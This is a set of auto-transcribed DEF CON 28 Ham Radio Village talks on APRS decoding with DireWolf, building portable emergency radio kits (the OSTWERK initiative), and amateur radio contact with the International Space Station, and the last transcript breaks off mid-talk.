Raspberry Pi and then use the instructions from GitHub here, the documentation repo to build it for your system. Finally it is literally just downloading the source and then compiling it. Once you've compiled it, you can start right out and get it running. So let's go to console and see what DireWolf gives us on their Raspberry Pi. What kind of information, what does it look like when you're actually using DireWolf on your Raspberry Pi? I'll go and I'll probably post maybe some quick dirty instructions for actually building a DireWolf kit on the website hamvillage.org. But for now let's go cut to the end results. I think I'm pretty low on time here and we'll go to the console here. So this is what a typical putty installation... Well not putty, this is what a typical terminal of DireWolf will read out once you're up and running. You will see traffic coming across from mobiles, handheld units and in my area definitely a lot of weather stations. So there's a plethora of information here and we can pick... Let's see, let's pick this latest one that came in. So this was an IGATE transmit, looks like... Okay that was just for that node. So let's go to this one, AJ6kw. So AJ6kw with a destination of aptt4 came in with this path and looks like some GPS coordinates. So he came in with some GPS coordinates, positioned with time. He is using a tiny track. So that's one of those cool little all-in-one devices and it's spitting out his coordinates, course and any other information. It's really cool just to see how much traffic you're going to get on these systems and the console. Let's see here's another one coming in. Looks like a Jeep on a mobile unit coming in here with some coordinates, course, altitude and he's monitoring on 146520. So it looks like Keith. And I can hit him up on that frequency, give him a chat and that's just really cool. The terminal here isn't necessarily the place you're going to want to stalk people on APRS, definitely use the web interface to do your stalking but that's just really cool to see what your radio is hearing directly because again the stuff posted on APRS.fi and APRS direct, whatever station heard it first is the one that gets to post it there. So you may have heard it but you may have not been the one that reported it to the servers there. So it's definitely something, definitely cool to see just the raw data. And see here we go, here's just an eye gate transmit from Frisco, Frisco Peak, just throwing a beacon out with its position and location and that. This is AL7BX's rig, good for the mind. He has helped me a lot with this APRS stuff. We definitely are working together to build out more APRS rigs in our area. So I think we're pretty much up for time on the demo. The wonderful radiogram talk was amazing and pushed us over a tad but no worries. Let's go answer some questions in chat if there are any. I know this was kind of a drone out presentation live demo but let's see if there's any questions either in Discord or in Twitch here. Give it a quick glance and we'll get going here. Okay well, definitely an earful. There's definitely more resources for APRS. If you want to get into APRS, you want to carry it along with you or you want to expand the APRS network yourself, go ahead and hit me up in the Ham Radio Village Discord on the DEFCON server or our own Ham Radio Village server. I'll throw leaks in chat. Just go ahead and I will even be able to help you remotely. I've helped people with remote desktop to help set up their rigs. Any help I can give, I'm just more than happy to expand and contribute to the APRS community. So thank you everybody and we'll see you back for closing comments here in just a little bit. Alright, bye.
|
In this live demo, we'll go over what APRS is, what you can do with it, and a quick primer on how to get started.
|
10.5446/51648 (DOI)
|
You You You You Hello everyone, thank you for joining me for my presentation about the Ostwerk initiative here at the DEF CON 28 safe mode I would like to thank you all for giving me an opportunity to show you the presentation I put together And if you have a passing interest in amateur radio, I hope you find it interesting Quick heads up most talks or presentations like this are usually an expert lecturing about a topic They are very familiar with to an interested audience This is kind of the opposite where today I'm an amateur radio enthusiast presenting more of a concept to people who know much more than I do Concept that's very fluid and open to change right now depending on community input All right, let's begin Please keep in mind that this is my first DEF CON so this is a learning experience especially for me If you have any questions during this presentation Feel free to ask them in the appropriate moderated channel in the DEF CON discord server and at the end I hope to have Not necessarily a Q&A but more of like a moderated round table style discussion about your thoughts about this project It's strengths and what it needs and I've never been part of something like that before so I'm interested to see how this goes I'm willing to take a gamble that many of you know what a lightsaber is for those that don't it's basically a laser sword from a popular movie franchise In the stories with rare exceptions if you wanted a lightsaber of your own you had to build it To your own exacting specifications So where the switches are the way it fits in your hand the weight and the balance it's all perfectly attuned to the builder Well, what if ham radio could have their own version of the lightsaber? Right off the bat what I hope to accomplish with this presentation is a way to simplify and encourage the planning and construction of amateur radio kits If that doesn't interest you then you are free to duck out now It won't hurt my feelings. I understand your time is valuable and we'll both be happier if you were spending it your time by doing Something that interests you so to those of you who already have an enthusiasm for amateur radio And you're probably not going to learn anything brand new But I want to keep some of the principles here in mind when you're elmering a new ham that wants a radio of their own All right enter the open-source tactical wireless emergency radio kit or twerk or twerk station a twerk is a custom kit built by a radio enthusiast to operate in times of an off-grid situation So you can build one for relaying voice messages into or out of a disaster zone Or you can set up a data network node or keep track of contacts during a contest Or you can administer a twerk station parliament each kit is custom built by the owner to be dependable Not just for casual use, but especially for emergency situations as well And it's my hope that this presentation motivates you to create a twerk station of your own or assist someone in the creation of their own twerk station I'd now like to walk you through a sample twerk station It is a voice twerk station that I built that has data capabilities on board It can't broadcast or receive data, but it could you could use the computer on board for a contest logging or local networking the This twerk station is sealed up in a durable plastic case and it's extremely water resistant and dust proof with the lids closed There's no external access ports, so you have to open the kit if you want to charge it or hook up the antenna Here it is open but undeployed The keyboard the microphone and the mouse kind of float around in there loose The switches and thumb screws in there do a good job of keeping them from sliding around But I still would like to add some kind of cushioning in there to avoid rattle damage So flipping the that blank panel that was in the lower part over you'll see that there is a remote faceplate for an ID 4100 Also under that panel is the fuse box and the cables that feed into the raspberry pi And the lower left is the power controller which switches automatically between external power and the lead acid batteries that are on board and then on the right are the pass throughs that The route pass through the microphone There's pass throughs that go for the USB and the audio cable into the raspberry pi and there is USB ports that are not pass throughs. They're just charging ports The Top left of the panel has the power controls and the power display the switches engage the battery the red one does and Then the black switch below selects between the main battery and the on board backup There's a power display that shows the voltage and amperage used by the kit So it's easy to estimate the remaining power at current use. And here's the fully deployed torque station Just to let you guys know the monitor on the right is being powered off of AC power that goes to USB C cable So it's not being powered off the kit right now That would be pretty trivial to do. I just need to find a reliable USB hub that That that is powered enough to keep all of all the hardware on board powered up So my prototype kit is done for the most part, but it's actually not the kit has a few issues for one thing It's really heavy I want the long battery life and sealed lead acid batteries are cheap But the kit can't be carried for more than a minute or two The radio I have is a decent radio, but I want to switch over to HF bands The kit has a big clunky antenna switch that I'm not going to use very often And I discovered some new power pole mounts. I want to incorporate into the design So now I know what to improve. I can budget to get new batteries and a compatible charger ditch the auxiliary battery in favor of bringing a solar panel and Upgrade the radio to an HF radio. I'll also need to design up a new mounting panel for all of these new parts So that was version one of the kit and some of the challenges that I'll need to overcome Now after I go over the three pillars of the Ostwork initiative I'll demonstrate the operation of the upgraded torque station at the end of the video Which may give some of you ideas for the kit you may want to build The Ostwork initiative has three pillars that I think would make it successful One is enthusiasm for the construction of torque stations second pillar is the online platform torquebench.org where a torque station constructors or torque smiths can compare notes and The third pillar is the torque Smith code of conduct and let's get into these in detail First off is the kit open source Are there schematics or diagrams or a build of materials available online somewhere so that I can build my own copy of the kit and put My own spin on it Second the the kits should be tactical. It should be constructed to work with other torque stations in the event of an emergency The kit should also have some degree of durability Just think about how many tiers are going to roll down your cheeks if the kit fell down a off a table or a tailgate The kit should be wireless Six hours of operation is a good ballpark and more is always better, but more means either more weight or more cost So balance your options carefully The kit can be used for emergencies or everyday use if you plan on using your kit every day be aware of heat buildup and have proper Ventilation or better yet just invest in a dedicated base station. Maybe The guidelines actually pretty loose one and it was added mostly because the acronym needed a vowel Next the kit should have a radio in it Usually a mobile rig a 12-volt kind of mobile rig, but it's encouraged to throw a cheap HT or other kind of walkie-talkie style radio into a power or Utility kit just to have one on hand just in case The final guideline is that everything is conveniently located into one single package The kit has everything it needs built in by the owner and delicate components should fold into the kit for protection during transport All right now let's get into the major types of torque stations you might see These are by no means all-encompassing, but should act as a starting point when designing a torque station First off is the voice torque a very common easy to make kit. It can be made from like a used radio and a sealed lead acid battery In some kind of durable case It's accessible from the outside and from the inside It's accessible for a get-on-the-air and tech licenses Second up is a data kit and those are similar to the voice kits But they have some kind of computer on board to take advantage of digital radio modes The computer can be a Raspberry Pi or a laptop or a surface tablet Whatever just some way to get to decode digital information and to get it out onto the air SATCOM kits are designed for satellite interfacing and they're usually paired with the special antenna And there's CWHF or weak signal kits And you want to be considerate of the weak signal kits because they're pretty sensitive to the EMF noise Those are some of the main types of kits that you're probably going to interact with or build And let's take a look at some of the support kit ideas some of the advanced level kits The auxiliary power kits supply power to your torque stations You also need to think of a way to replenish power if there's no grid solar is a pretty popular option Next up antenna kits provide masks feed line and the antenna is necessary for broadcast and reception Some kits are as simple as a spool of wire and others have complex folding mechanisms Troubleshooter kits are stocked with all the tools adapters duct tape zip ties Everything you need to keep everyone on the air and happy and remember to always thank your troubleshooter And if a torque station parliament gets too cumbersome someone can step up as net ops to take care of the administrative side of things during a crisis They can act as one point of contact and direct the appointment of a power comptroller to oversee the power consumption In a multi-day grid down situation So lots of coordination options available if you'd like Finally we have a few rare torque stations These are a couple torque stations that you won't see in the wild that often First off is the llama big and heavy the llama is for the person that overpacks for every trip It tries to do too much and doesn't tend to do anything very well The rarest type of kit is the Alright, so those were the torque stations. Let's move on to pillar two or the online platform This is kind of the weakest pillar for me. I am not a web expert at all I have a lot of ideas based on stuff that I've seen online, but I don't really have a way to implement them So this is where I am going to need the most help, but here are some of the ideas that I've got The website should have a link to their own forums, hopefully A place people can submit photos and designs to be featured in the gallery A place where people new to the hobby can stop in and have any questions answered The website will also have a feature similar to PC part picker Where you can pick out and design your own torque station And have it tell you approximately how much power you'll need The website will also hopefully feature a regional map That assists torquesmiths to find each other And maybe display power levels and capabilities of a particular registered region So if you want to compete against nearby towns as to who's got the most power Standing by in the event of an emergency, that would be kind of fun One additional item would be a portal where student radio groups could design an ideal torque station And find a place to get help with fundraiser or grant writing or sponsorships A few more website ideas Again, I have no idea how to implement these So this is all wishful thinking right now The website might have a torqueathlon information and I'll discuss what that is later The site would have not just a kit builder, but a kit panel builder Where people could design custom panel for their kits Drag and drop precise holes or precise cutouts for parts that they know they want in their kit In the same vein, the site could have a makerspace locator where torques could be used Or a local makerspace locator where torquesmiths could find a local makerspace to help with tools Or 3D printing or laser cutting, anything for constructing torque stations You know, maybe we could make some arrangements for partnerships or sponsorships or discounts or something Finally, the site could have an online marketplace Where you could buy patches, stickers, small custom trinkets that could make your kit stand out You won't be able to buy torque stations because that defeats the purpose of the whole initiative If you want a torque station, you got to build one yourself The third and final pillar is one that I'm sure people will gloss over The Torquesmith code of conduct Just a handful of principles that I hope people will live by If they want to build their own torque station A good Torquesmith is courteous If you build your torque station properly, it should attract a little attention from people who may have a passing interest in our hobby So be ready to be peppered with a few questions every once in a while when you're using your torque station A good Torquesmith is competent A torque station is built to the exacting specifications of its creator and any shortcomings of the kit lie with the builder So know how to operate your kit and know about how much power you have left at all times in an off-grid situation Also know how to budget your remaining power responsibly A good Torquesmith values their community, both online and offline Ideally you would know a couple nearby torque station owners and agree on a schedule to make contact should the worst happen in a grid down situation Also see what you can do in a disaster to supply comfort and relief to those negatively affected A Torquesmith values their own personal honor They would never cheat a contest and would never reveal the contents of the mystery box A Torquesmith shows their work There are people out there who are interested in seeing what you've made I know I am What makes your kit special? How does it fit into your lifestyle? Finally a Torquesmith knows that there is always room for improvement Whether it's cheaper components or farther range or better battery life, whatever A Torquesmith knows that their kit is never finished and it's just a jumping off point for better things So those were the three main pillars of the Ostwerk initiative And here are some bonus slides at the end I'm going to go over something I came up with called the Torcathlon And then we'll take a tour of a Torque station that I built, a Llama class So what if there was a competition where teams could show off their ingenuity and hustle Basically a small course is set up with obstacles to climb over or struggle through That would resemble maybe a post disaster situation And teams of Torque station owners would try to race against the clock to carry their stations Any way they want through the course And then when they get the finish line They use them to relay some traffic through a remote judging station at the end Costumes and theme teams are encouraged And a reminder should go out beforehand saying that public intoxication of all types is frowned upon All right, so here is my latest kit There's a little red patch on the top where I adhere a suction cup antenna There's about four latches on the kit that keeps the kit airtight Watertight, dust-proof I still don't have a decent solution to this But I'm going to go ahead and try to get a little bit of a look at the kit And then I'm going to go ahead and try to get a little bit of a look at the kit I still don't have a decent solution to keep everything from sliding around I've got the keyboard here And I've got the microphone to uncoil Check for product shifting during transport Everything looks good I'll get ready to mount the software radio antenna Just onto the lid onto that red square of vinyl that I put on there Because the suction cup doesn't adhere to the course plastic of the kit So I need something smooth to stick the suction cup onto A little GPS antenna A little USB GPS antenna sticks to a metal clip For locking the kit shut I'll get that screwed on Alright, let's get ready to hook up the external power I've got my shanktronics power brigands supplying all the power I need for the kit Turn it on, and I can see the display on the kit turns on Alright, let's get the Raspberry Pi fired up I've got the power switch there next to the pass-through for the USB and the audio for the Raspberry Pi I've got the dual monitors hooked up, and oh well I've got this The USB switch was powered on The USB hub there was powered on So now that the computer is booted up, I'm just going to control it with the Logitech keyboard here I'll fire up my FL rig And I'm going to boot up my RadioData software package WSJTX And unfortunately the kit is not cooperating with me The radio is receiving, but it's not putting audio from the radio into the Raspberry Pi And that's a problem I really need to troubleshoot here Moving along, I can fire up GQRX Which I have pre-programmed to decode the local classical radio station But the cool thing about the SDR is that I can program any channel I want to into here, any channel that the SDR is able to decode Alright, now for the moment you've all been waiting for a closer look into the SnacksS panel So we remove the panel And inside we have an array of Snacks We have a post snack treat We have some crunchy snacks We have some sweet snacks And we also have some more salty snacks And then all the snacks get tucked right back away into the SnacksS compartment And we replace the SnacksS panel I hope to incorporate some kind of magnets or maybe 3D print a latching solution for sometime in the near future Alright, let's power down the kit I'll log off the Raspberry Pi And then flip off the power switch here That terminates power to the monitors and the Pi Turn off the radio And then disconnect the battery We've been running off battery power this whole time Battery power disconnected And as a safety measure I'm going to turn it from battery power to external power So in case the switch gets bumped For some reason it doesn't drain the battery And for those of you who are interested Here is a blocky wiring diagram for how the kit works I've got the two ports, a solar port for power input And a 12 volt port for external power input And then it goes into the power work solar charge controller And then that charges the battery And then I have the big red battery cutoff switch Between the battery and the external power And then that feeds into the fuse block And then the fuse block shoots out the 12 volt leads to all of the hardware in there that runs off of 12 volts Alright, you've made it to the end of the pre-recorded portion If you're still interested you're welcome to visit the website twerkbench.org To see what we have so far, and if you want to voice in the direction this project goes You can join the Discord community by visiting our Discord server online The link there is on our website at twerkbench.org And I'm going to do a live Q&A now and hopefully a demo Of my equipment cooperates to round out my presentation time So please stick around and we can hopefully have a moderated discussion where we can share ideas And where this initiative should go moving forward Cool, so we have SwissNinja here and I'm live on video feeding I think he's ready to give us a nice demo Before you start though I do have a starting question Is there any sort of mod or thing you've made that you've tried to make And just messed up so bad that you just said nope this is going in the trash, I have to start over No, but leading right up to this presentation The audio input that goes from my HF transceiver to the Raspberry Pi Won't detect the audio signal, like I know that the audio signal exists But it's not going into the Pi I wanted to show off a couple of data modes that I would be able to receive on the Raspberry Pi But that won't be done today's presentation I was curious if anyone had any quick questions or anything that I maybe I didn't cover in the video Or any suggestions Because it looks like the chat topics are a little empty right now Did anyone have anything to ask or add? So I'm curious if anyone has any experience with working with a volunteer software team or web development team Because a big part of the pillar of the initiative here is the website And the website we have right now is very basic And I'm learning web stuff as I go along But I wouldn't mind supercharging it with a couple team members So if anyone worked with a volunteer team in the past to get something like this done I'm not aware of any personally I mean I'm curious are you also releasing all these like plans and open source stuff to like get something like GitHub as well? Oh absolutely yes, yes so I hope that other people can join in And like I said copy plans like they can take a look at the Torque Station I built That's kind of what the stemmed from was I saw kits online I would say that oh those are so awesome but I could never have one of those And then one day I decided to put a kit together for my father at the behest of my mom She was curious how we could all get together in the event of an emergency And I said oh well ham radio and I wanted to get like an all in one solution that they could use after getting their ham radio licenses To get on the air with me in the event of a grid down situation And so I would see the kits online and I would say oh those are awesome And then I decided to just build one myself and it was surprisingly easy And I just want to let people know that I want to remove the barrier to entry to making kits for themselves Like a big one is the panel of the kit Like I can actually start moving stuff around here Like being able to laser cut I have a laser cutter in my garage and being able to laser cut a panel whenever I need a new one is a huge blessing But I want other people to be able to have that access to like to nearby maker spaces places where they would be able to download plans for a panel And then be able to have them cut out So that would probably be a portion of the website would be being able to coordinate people to be able to make their own things Or this panel that the radio is inset in is 3D printed I've got my own 3D printer I know a lot of people that's a barrier to entry they don't have their own I'd like to be able to connect people that want to have their own inset panel mount things like I've made Or that they've designed their own I want to connect them with online resources to be able to get them printed out Cool we do have a couple of questions here from the audience One is what if you need more room for snacks I'm assuming there's going to be some sort of like snack expander box or something like that Oh yeah there's always you can get extra kits to put extra snacks in You can always sacrifice extra battery power get a smaller radio right now This design of the 3D inset panel for my radio face is just kind of basically a prototype It's kind of there's a lot of wasted space around the edges you can see so it still needs refinement I hope to post the plan files online so that people can download and print them It's actually this this panel itself is on Thingiverse if you Google or if you use the search for Jigoo G90 It should pop up as one of the 3D printable items And then I also hope to have like sticker templates like I like the industrial style of stickers so that's my kit Some people might have something less colorful or more colorful more informative maybe more minimalist So I hope to have like vector files online available for stickers if you want to download them yourself Great it's great to hear some more questions coming in here what type of brand of case do you use in this kit This is a Harbor Freight Apache case I hope to put a once I've I've a lot of done some upgrades to the kit And I hope to have a completed bill of materials done once my presentation I've been prepping for the presentation here for a while And I hope to have a complete a bill of materials done but the case itself is an Apache Harbor Freight case They're very affordable they're they're very similar to Pelican cases they come with a foam block you can pick apart inside for cushioning parts I took the foam out so that I've had greater airflow through the kit And I guess here as in as a Defcon exclusive I usually don't show off the inside of my kits especially when they're under construction But if there's interest I'd like to show off kind of what's inside the kit Normally I would have thumb screws on the side that I would undo but I haven't gotten around to those yet I'll remove the Snacks S panel and the wires are still kind of a mess I've got a battery lithium iron phosphate battery that I just put in the kit last week I have a USB hub that comes out of a Raspberry Pi underneath and I need a better solution maybe some kind of little shelf to build in here to separate everything out so there's better airflow And then the radio here is in the back I have an RTL-SDR software radio that goes into the Raspberry Pi And of course I have the Snacks off to the side and a fuse block that the 12 volts come off of Cool we got a question about maybe using magnets to hold down the panel on the keyboard like the Rayworth magnets, that's something you've looked at Yeah that would not be a bad idea at all The keyboard has a weird kind of curve to the back so I would have put like a Velcro or something maybe on there that would snap down But magnets would be a good idea too I just need a way to either epoxy or anchor the magnet to the keyboard or maybe to the box and then maybe put a plate on the back of the keyboard See these are all great ideas that you could post to the Torx station discord or the forums if we ever get them up and running Absolutely, absolutely. A question here on the chat about have you considered using solar for power and maybe there might be some interference with that Oh, so that was another thing that was brought up in our discord chat a few days ago was someone who had a question about solar controllers and noises and if anyone had experience with expensive versus cheap ones I actually have a solar panel on the way it's going to be here tomorrow Someone posted a bargain online for one of them and I snatched up a nice folding one But yeah so I had a couple batteries in my version one of the kit so that I'd have a lot of power and in this version two you saw the one lithium iron phosphate battery in the back That was about 1500 amp hours and I labeled a switch with 14 amp hours so that or 1500 milliamp hours excuse me and then I have the switch labeled 14 amp hours so that I have a little cushion left over I'd love a 15,000 amp hour battery Yeah, that would be great So I have a question here about you mentioned no selling for benches but what about individual parts I would like to have in the bill of materials links to parts that people use or when I built my computer a few years ago the PC part picker website would continually scan other websites would scour for prices and tell you who had the lower price and if there were any sales going on Ideally there would be some kind of functionality that's like very very very far down the road but for parts ideally like I would just put my Amazon links for where I got all the parts basically all the parts of the kit What kind of kicked off the kit plan design was this red kill switch that I installed I've always loved these growing up and being able to buy them by a five pack was incredible like I love being able to buy stuff like that online these power connectors are 3D printed those were made by I found them on Thingiverse Yeah, most of the stuff was I was able to source online which I wouldn't have been able to do about 10 years ago. So being able to source stuff online is a great, great benefit to the ham radio hobby. Great question from tWitch. What are the temps inside the case when everything is powered on and running. It depends. I haven't used a heavy duty cycle. I can't imagine it's very warm with just the Raspberry Pi running. If I was broadcasting a lot with the radio, the temps might get pretty warm. I thought about putting active cooling in. I've got empty space up here above the display panel if I wanted to put a couple case fans up here just to move air through. I could move some of the air slots around. So this is basically the prototype version of this panel. It's made out of MDF wood that I spray painted black. I hope to source a plastic panel from the local plastic store. They make a nice textured plastic, a black textured plastic that I think will look really sharp but it's going to be more expensive than the MDF. I want to make sure that the layout is done before I get the final panel cut. Great. That sounds pretty awesome. We've got a question here about when it comes to selecting components, what part do you suggest that people don't skimp out on when it comes to parts and what parts you think people can maybe buy the cheaper version of? That is a very good question and that's actually part of the reason I kicked off the Ostwork initiative was to help answer that question for me so that I'd be able to select parts for my kits. I know a lot of people out there have bought parts and they know what works and what doesn't. This is a learning experience for me, but it's kind of an expensive one. So I before I pull the trigger on an expensive solar charge controller or which I imagine if you want low noise like on the HF bands, you probably want. You probably don't want to skimp on your charging controller. I've noticed a little bit of noise running the pie. I don't know if I'm going to be able to shield that if I be able to build a little shielded shelf maybe around the pie where airflow could go but RF noise can't. So there's lots of ideas for improving the kit and they can always be improved, but I don't have any suggestions right off the bat. But I would imagine probably your charging controller, especially if you use expensive batteries or and that's another thing you want to consider when picking parts is make sure your charging chemistries are compatible. When I made the first version of this kit, I used lead acid batteries, and then they were super heavy but I had to upgrade to well I didn't have to upgrade but I wanted to upgrade to lithium iron phosphate batteries which are lighter a lot more expensive. But they also use a different charging chemistry I can't use the lead acid charging system that I had in the old kit in this new kit. So I had to budget for a new charging system for the kit that was compatible with the lithium iron phosphate batteries. Great. Yeah, there's a couple comments here in Twitch. One person talks about, you know, if you don't want to take a charge controller taking a lot of space, maybe have a different a torque station that's a like a power module, you know, power type torque station does all that just in its own separate box. Yeah, that was an idea like one of the power torque stations like I want to have a power interface kit. So people would be able to tap into different powers or different like electric vehicles or solar wind water like a kit that would be able to convert a variety of voltages down to the kit voltage. And so, yeah, that's something for people to consider whether they want to whether they want to build it into their kit or whether they want to carry an external kit that would that would house that functionality, but the kits would hopefully be functional or be compatible not only with each other, but with other torque stations as well. Yeah, I've also started to see a rise in popularity of the they call you know battery generators quote unquote or just basically a battery box with a bunch of power distribution that you know, buy off the shelf which is kind of nice for like I just need power and I need lithium power and off grid. We're going to question. Yeah, go ahead. Oh no, it's gonna say yeah those are great. Yeah, I have not not splurge on one yet but hopefully soon. Question here could you talk a bit more about the antennas and or connectors used for the antennas the hook up to this kit. Yeah, I use just the standard UHF antenna connector. I've got actually probably easier if I just took off my nano DNA here. So this is a nano vna I have kind of Velcroed to the kit. It's used as an antenna analyzer, and I use this type of connector. Do I'm going to embarrass myself here PL 259 or SO 238 or 239 I mean, but it's just this standard type of antenna connector, and then I have a few I have a box around here with different adapter connectors for the antenna, but the antenna that I have to use right now is I got from my brother a BW AP 10 a I don't have the whip on it right now there's a whip that extends off the top that I can raise and lower, and then it also has a tunable loading coil that I can adjust for the frequencies to get a better reception or better broadcast on those frequencies. But that just has a the same type of screw that screws on to the screws on to the the the kit there the bulkhead connector. Very nice. Yeah, you can always just say UHF connector in your good. Yeah, specific. I think that's an SO I think it's SO is socket PL is Polog I think is what it is. Oh, okay. So I think that's all we have for questions right now in the chat. Is there anything else you guys want to show or talk about. Um, I'm just curious if anyone had just thought of any like if this is inspired anyone to make their own kit or if anyone has any ideas actually here's an idea so for in person, the ham radio village. What if we could maybe start a fundraiser to make a three or four torque stations for a get on the air station. And then at the end to give them out to school groups. And then they can just be a fundraiser kind of thing to make the stations and then and then after they're used for people to get on the air. They can just be a donated out like would that be something people are interested in. Yes, I'm going to have to take the pulse on you know just also just completely off the cuff pop my head and you could have a, you know, potentially even prior to Defcon said okay well build your best you know torque station and come you know during the competition. That could be part of the torque Cathalon maybe if we if that if that ever takes off. I mean it's not Defcon if there's no slaughtering errands involved. Maybe a build one within like an hour to competition or something maybe. Cool. Well thank you for putting this presentation together and hanging out and chatting with us. I thought this was a panel. Yeah, even get a comment in the chat someone says he's very inspiring so it's great to hear. Thank you for coming. I thank you all for joining me and thank you to the staff for putting this on. Next to it. Yeah. Yeah.
|
OSTWERK stands for Open Source Tactical Wireless Emergency Radio Kit, an all-in-one customizable solution for building ham radio kits. This will be a a 30 minute talk and Q&A about the initiative, my sample kit, and what I hope to accomplish (website features, sponsorships for kits for schools, etc). Feel free to ask any questions after the presentation, or at my information table in the Ham Radio Village discord server!
|
10.5446/51649 (DOI)
|
This is also going to be a one-cut take like a normal Def Con presentation would be. So there's going to be a lot of flugs, a lot of hems, a lot of haws. That's about it. I know it's without further ado, let's get going. Can't even transition a slide, alright. So a little bit about me in my background. I started off my professional life as a civil engineer. I went to college, got my bachelor's degree, master's degree in civil engineering, became a professional engineer and realized it really wasn't for me. I didn't really like it as much as I thought it was going to. I then got an opportunity to start a security analyst position at Barrick Food and Networks. We started coming to Def Con, Def Con 22. So I've been here for what, six years now, seven years now. And I love doing anything wireless. I love wireless security. So I started playing in the wireless CTF and we won three years in a row, I believe. And now I'm a village member, so now I get to help make the challenges. And yeah, it's one of those things that the reason I started off with this is because I forever feel like a noob. I forever feel like the imposter syndrome is a real thing. And this talk is more of a, I'm not an expert in this, but it's something that I find really interesting and it definitely encapsulates that hacker mentality. So if this is your first Def Con, you're going virtual, you're watching this talk, don't hesitate to get your feet wet to reach out to people because at the end of the day, I feel like everybody feels like a noob. And if they don't, then they definitely are a noob. So without that, I basically just wanted to give my background that I didn't have a, you know, computer science degree. I didn't have a formal background in computer security or really anything at all except for civil engineering. So don't, don't hesitate to get yourself out there. So this talk, talking to satellites, why? Personally, I think it's cool. The International Space Station is specifically what we're going to be going to cover. So there's a lot of satellites that are floating up above us or orbiting above us that are capable of, you know, ham radio communication or just communication from the ground just by normal citizens that don't require, you know, any special permission other than ham radio license to transmit to. Well, it's cool about the International Space Station. I mean, it's orbiting 200 miles above us, which actually when I, when I first started doing this, 200 miles didn't seem like a lot to me. It seemed like that, that it should be orbiting higher than that. But soon a mile's up, it's going roughly 17,000 miles an hour. And that's 10 times faster than a bullet. Just kind of put it in like rough perspective. And it is going, it's orbiting so quickly that it can go around the entire planet in about 90 minutes, which I think is incredible. And it's also the most expensive object ever built, which is kind of neat that just being a normal civilian, I can talk to the International Space Station and even to astronauts on the International Space Station with just, you know, general equipment and just a ham radio license. And even if you don't have a ham radio license, you can still listen to transmissions from the International Space Station, which is also, I think, pretty cool. So here's a quick overview. Basically, we're, have a talk to ISS on the Chief, the how's and the why's of, you know, why you'd want to do it and how you do it, the gear that you're going to need, the software that you'll need, the rough skills that you might need to have or, you know, brush up on. And timing when you're going to talk to the International Space Station because it's orbiting every 90 minutes and there's only very narrow windows that you can actually, you know, try and communicate with it on. And then basically just now that you have all this power, how not to be a jerk. I feel like hacker mentality is the, you know, like, oh my gosh, we're going to do all these bad terrible things. But at the end of the day, you know, should you, this is, this is something that's pretty cool. And you want to give others the opportunity to do it as well. See, moving on. So the how's and why's. So there's AR ISS, which is amateur radio on the International Space Station. Basically this is up there for educational purposes. It's community driven. It's one of these things that kind of inspire the, you know, the heart of people of, hey, what are we going to do with space? Why is space important? So I think it's kind of cool that they have a couple, you know, amateur radio stations on board in it or not stations, but I guess transceivers on the International Space Station that are that are meant for amateur radio operators to interact with. So what we're going to be talking about is the two meter packet radio that's unattended on the International Space Station. There are definitely some attempts that you can have where crew members might be staffing the International Space Station and actually on the ham radio that you can talk to via voice. However, to try and get that to work is, is, you know, it's a far more limited and you have to plan far more, you know, up in advance. Whereas the unattended packet radio basically is going to act as like a repeater for you and it's always up and always operational. And it's just one of those things that it's far easier to get a communication, you know, repeated from the International Space Station because it's done automatically. And there's a bunch of other operating modes that the International Space Station has. And you know, you can go online at any point in time and check that. But really what we're going to be focusing on is the two meter packet radio. And so I also had no idea that, you know, a lot of ISS crew members are also ham radio operators, which I thought was kind of cool. Yeah, so we'll just, you know, break down the basics of it to transmit and talk to the International Space Station. You're going to need a ham license. And that's just to transmit. And that's really because you're going to be operating on frequencies and with hardware that could, you know, cause issues for other people. So it's not just like a cell phone where, you know, your phone is going to take responsibility for talking back and forth to a cell tower. This is something that, you know, you're going to have transmit power and you want to be judicious with how you use it. However, that being said, if there's something that's interesting to you, you can listen without a ham license, no problem at all. You know, you don't need anything just to listen. It's really just transmitting because that could affect other people. And if you want your ham radio license, the ham radio village is offering I believe $5 exams, which is, I mean, pretty cheap. Normally it's, I think $20, but everything's going to be virtual, obviously, because it's DEF CON. And for $5 to, you know, make an attempt at your technician license, it's one of those things I think you have to renew it every 10 years. I definitely recommend checking it out. You know, it's definitely a great opportunity. All right. So there's a lot of things that I never quite understood when I was getting into all of this. And again, by no means an expert. So there's probably a ton of, you know, things in these slides that a seasoned, you know, extra ham operator is going to know that I'm going to completely flub up on. But I basically just, this is something that, you know, whenever I looked at this, I would always kind of say, oh my gosh, I don't even know what all of this garbage means. So when people always said two meter band, I had no idea what the heck is a two meter band, you know, FM, 1200 BPS packet radio, all that stuff just sounded like gibberish to me initially. And I really wish that somebody would have explained it to me in layman's terms, you know, just so I could at least get the basics and then kind of dig down from there, at least, at least kind of get my feet wet. So if you look at that small little equation on the right hand side of your screen, you're going to see it's C equals, I think that's lambda and then whatever the new, I don't even know the Greek symbols, right? But at the end of the day, what happens is C is the speed of light. So if you divide that by your frequency, which is a megahertz, a megahertz is a million hertz, so a million cycles per second. So you can think of Wi-Fi as 2.4 gigahertz, you know, or 5.8 gigahertz, just kind of put that in perspective. So if you divide the speed of light by the megahertz of the frequency you're transmitting on, you divide those two and you get two meters. That's kind of how the math works out. And so when people say, oh, it's on the two meter band, well, that's the same thing as saying it's about 144 megahertz-ish. I think the two meter band's anywhere from 144 to 148 megahertz. But that's what people are talking about. So 70 centimeters, you can do the same math and figure out that it's about 460 megahertz, I think, off the top of my head. And that's also considered VHF. So you'll hear VHF, two meter, and 144 megahertz. Those are all kind of in the same ballpark. And that's just one of those things to hear those terms thrown around a lot. And I had no idea what they meant. So I figured it would be helpful to kind of throw out a slide and explain that briefly when somebody says I'm operating on the two meter band. Oh, OK, that means 144 megahertz-ish. You know, and that's also considered VHF, very high frequency. So the next part of that, what is FM? You know, you probably have heard of AM-FM radio in your car. AM is amplitude modulation. So you can see the little graphic on the bottom right of the screen. That's where the wave is actually modulated up and down. So you can kind of think of this waves and a pond. You know, if you throw a rock in and there's big splash, those waves are going to be bigger and that's going to be amplitude. You know, there's a, the varying amplitude there. Whereas FM is how close those waves are, you know, in a ring and a circle. Sorry, I'm using my hands a lot. I don't know, probably look like magician. But basically you're stretching like a slinky, you know, FM waves. You're modulating the frequency how fast it goes. So you know, there's AM-FM. So we're looking at two meter band FM. So it's frequency modulated. And this is typically not something that you're going to have to worry about. It's lower level stuff that the radio is going to take care of. But it's just good to know because I didn't know it when I started out. Gosh, 1200 BPS. So it's a bod not bits. If you mess this up, you know, the internet's going to murder you because you're, you know, technically wrong. I always thought that bod and bits were exactly the same. It 